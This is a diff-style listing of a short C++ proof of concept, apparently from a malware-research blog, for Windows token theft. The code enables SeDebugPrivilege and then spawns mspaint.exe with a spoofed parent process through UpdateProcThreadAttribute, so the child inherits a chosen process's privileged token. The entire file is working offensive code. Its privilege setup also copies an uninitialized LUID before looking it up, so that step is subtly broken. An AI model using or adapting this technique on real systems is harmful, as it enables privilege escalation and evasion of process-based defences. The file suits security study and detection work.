| 1 | + | /* |
| 2 | + | hack.cpp |
| 3 | + | token theft via |
| 4 | + | UpdateProcThreadAttribute |
| 5 | + | author: @cocomelonc |
| 6 | + | https://cocomelonc.github.io/malware/2022/10/28/token-theft-2.html |
| 7 | + | */ |
| 8 | + | #include <windows.h> |
| 9 | + | #include <stdio.h> |
| 10 | + | #include <iostream> |
| 11 | + | |
| 12 | + | // set privilege |
| 13 | + | BOOL setPrivilege(LPCTSTR priv) { |
| 14 | + | HANDLE token; |
| 15 | + | TOKEN_PRIVILEGES tp; |
| 16 | + | LUID luid; |
| 17 | + | BOOL res = TRUE; |
| 18 | + | |
| 19 | + | tp.PrivilegeCount = 1; |
| 20 | + | tp.Privileges[0].Luid = luid; |
| 21 | + | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; |
| 22 | + | |
| 23 | + | if (!LookupPrivilegeValue(NULL, priv, &luid)) res = FALSE; |
| 24 | + | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token)) res = FALSE; |
| 25 | + | if (!AdjustTokenPrivileges(token, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) res = FALSE; |
| 26 | + | printf(res ? "successfully enable %s :)\n" : "failed to enable %s :(\n", priv); |
| 27 | + | return res; |
| 28 | + | } |
| 29 | + | |
| 30 | + | // create process |
| 31 | + | BOOL createProcess(DWORD pid, LPCWSTR app) { |
| 32 | + | STARTUPINFOEXW si; |
| 33 | + | PROCESS_INFORMATION pi; |
| 34 | + | SIZE_T size; |
| 35 | + | BOOL res = TRUE; |
| 36 | + | HANDLE ph = OpenProcess(PROCESS_CREATE_PROCESS, false, pid); |
| 37 | + | printf(ph ? "successfully open process :)\n" : "failed to open process :(\n"); |
| 38 | + | |
| 39 | + | ZeroMemory(&si, sizeof(STARTUPINFOEXW)); |
| 40 | + | ZeroMemory(&pi, sizeof(PROCESS_INFORMATION)); |
| 41 | + | InitializeProcThreadAttributeList(NULL, 1, 0, &size); |
| 42 | + | si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size); |
| 43 | + | InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size); |
| 44 | + | UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &ph, sizeof(HANDLE), NULL, NULL); |
| 45 | + | si.StartupInfo.cb = sizeof(STARTUPINFOEXW); |
| 46 | + | |
| 47 | + | res = CreateProcessW(app, NULL, NULL, NULL, true, EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi); |
| 48 | + | printf(res ? "successfully create process :)\n" : "failed to create process :(\n"); |
| 49 | + | return res; |
| 50 | + | } |
| 51 | + | |
| 52 | + | int main(int argc, char** argv) { |
| 53 | + | if (!setPrivilege(SE_DEBUG_NAME)) return -1; |
| 54 | + | DWORD pid = atoi(argv[1]); |
| 55 | + | if (!createProcess(pid, L"C:\\Windows\\System32\\mspaint.exe")) return -1; |
| 56 | + | return 0; |
| 57 | + | } |
| 58 | + | |